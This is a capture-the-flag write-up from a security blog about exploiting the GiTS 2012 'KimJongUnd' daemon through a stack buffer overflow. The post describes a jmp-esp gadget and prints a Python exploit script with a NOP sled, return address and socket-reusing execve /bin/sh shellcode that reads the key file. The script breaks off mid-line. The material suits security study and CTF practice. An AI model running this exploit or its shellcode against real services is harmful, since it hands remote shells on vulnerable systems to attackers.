codezen.fr code hacking, zen coding

29Jan/12Off

GiTS 2012 KimJongUnd Write-Up

Posted by aXs

Stage 13

Question: KimJongUnd

We lost many time on this exploitation challenge for many reasons.

The vulnerability is when you input the command line after the password, there is a buffer overflow and you can control EIP.

Our buffer is on the stack so we spend some time finding a nice ROP gadget like this one:


.text:08048850 55 push ebp
.text:08048851 89 E5 mov ebp, esp
.text:08048853 FF E4 jmp esp
We have around 50 bytes available. Since we are in a forked daemon using socket we will first go for a shellcode that will read the command from the socket and output back to the socket.

#!/usr/bin/env python

import socket
import sys
import time

if len(sys.argv) != 3:
  print '\nUsage:\t./kim.py [host] [port]'
  sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)                         # Creating Socket
s.connect((host, port))                                                       # Connecting to socket
crash  = '\x90' * 524
crash += '\x50\x88\x04\x08'

crash += '\x31\xc9\x31\xdb\xb3\x04\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5'
crash += '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'

crash += "        exec cat key\n"

crash += '\x<